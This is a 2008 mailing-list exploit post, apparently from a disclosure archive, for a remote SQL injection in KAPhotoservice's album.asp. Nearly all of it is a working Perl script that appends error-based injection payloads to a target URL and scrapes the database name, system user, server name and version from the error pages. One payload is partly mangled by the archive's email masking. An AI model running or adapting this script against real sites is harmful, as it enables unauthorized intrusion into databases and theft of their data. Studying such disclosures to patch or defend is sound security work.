KAPhotoservice (album.asp) Remote SQL Injection Exploit

sys-project Thu, 20 Mar 2008 18:08:36 -0700

[+] [JosS] + [Spanish Hackers Team] + [Sys - Project]


[+] Info:


[~] Software: KAPhotoservice (Payment)

[~] Demo: http://www.kaphotoservice.com/photoservice/

[~] Exploit: Remote SQL Injection [High]

[~] Bug Found By: JosS

[~] Contact: sys-project[at]hotmail.com

[~] Web: http://www.spanish-hackers.com

[~] Vuln File: album.asp


[+] Exploit:


#!/usr/bin/perl


# KAPhotoservice - Remote SQL Injection Exploit

# Code by JosS

# Contact: sys-project[at]hotmail.com

# Spanish Hackers Team

# www.spanish-hackers.com


use IO::Socket::INET;

use LWP::UserAgent;

use HTTP::Request;

use LWP::Simple;


sub lw

{


my $SO = $^O;

my $linux = "";

if (index(lc($SO),"win")!=-1){

                   $linux="0";

            }else{

                    $linux="1";

            }

                if($linux){

system("clear");

}

else{

system("cls");

system ("title KAPhotoservice - Remote SQL Injection Exploit");

system ("color 02");

}


}


#*************************** expl ******************************



&lw;


print "\t\t########################################################\n\n";

print "\t\t#    KAPhotoservice - Remote SQL Injection Exploit     #\n\n";

print "\t\t#                        by JosS                       #\n\n";

print "\t\t########################################################\n\n";



$host=$ARGV[0];

chop $host;

$host=$host."/album.asp?cat=&apage=&albumid=";


if(!$ARGV[0]) {

    print "\n[x] KAPhotoservice - Remote SQL Injection Exploit\n";

    print "[x] written by JosS - sys-project[at]hotmail.com\n";

    print "[x] usage: perl $0 [host]\n";

    print "[x] example: http://host.com/PHPWebquest\n";;

    exit(1);

 }


@comando=("1+and+1=convert(int,db_name())","1+and+1=convert(int,system_user)","1+and+1=convert(int,[EMAIL
 PROTECTED]@servername)--",'1+and+1=convert(int,@@version)--');



for ($i=0;$i<=3;$i++)


{


my $final = $host.$comando[$i];

my $ua = LWP::UserAgent->new;

my $req = HTTP::Request->new(GET => $final);

$doc = $ua->request($req)->as_string;


if ( $doc =~ /Syntax\s(.*)<\/font>/mosix )

{


if ($comando[$i] eq "1+and+1=convert(int,db_name())")

{


print "db_name:\n";


$dbname = $1 if ($doc =~ /.*value\s'(.*)'\sto.*/);

print "$dbname\n\n";


}


if ($comando[$i] eq "1+and+1=convert(int,system_user)")


{


print "system_user:\n";


$systemuser = $1 if ($doc =~ /.*value\s'(.*)'\sto.*/);

print "$systemuser\n\n";


}


if ($comando[$i] eq "1+and+1=convert(int,[EMAIL PROTECTED]@servername)--")


{


print "servername:\n";


$servername = $1 if ($doc =~ /.*value\s'(.*)'\sto.*/);

print "$servername\n\n";


}


if ($comando[$i] eq '1+and+1=convert(int,@@version)--')


{


print "version:\n";


$version = $1 if ($doc =~ /.*?value\s'(.*?)'\sto.*/sm);

print "$version\n\n";


}


} # Cierre del if principal

} # cierre for

KAPhotoservice (album.asp) Remote SQL Injection Exploit

Reply via email to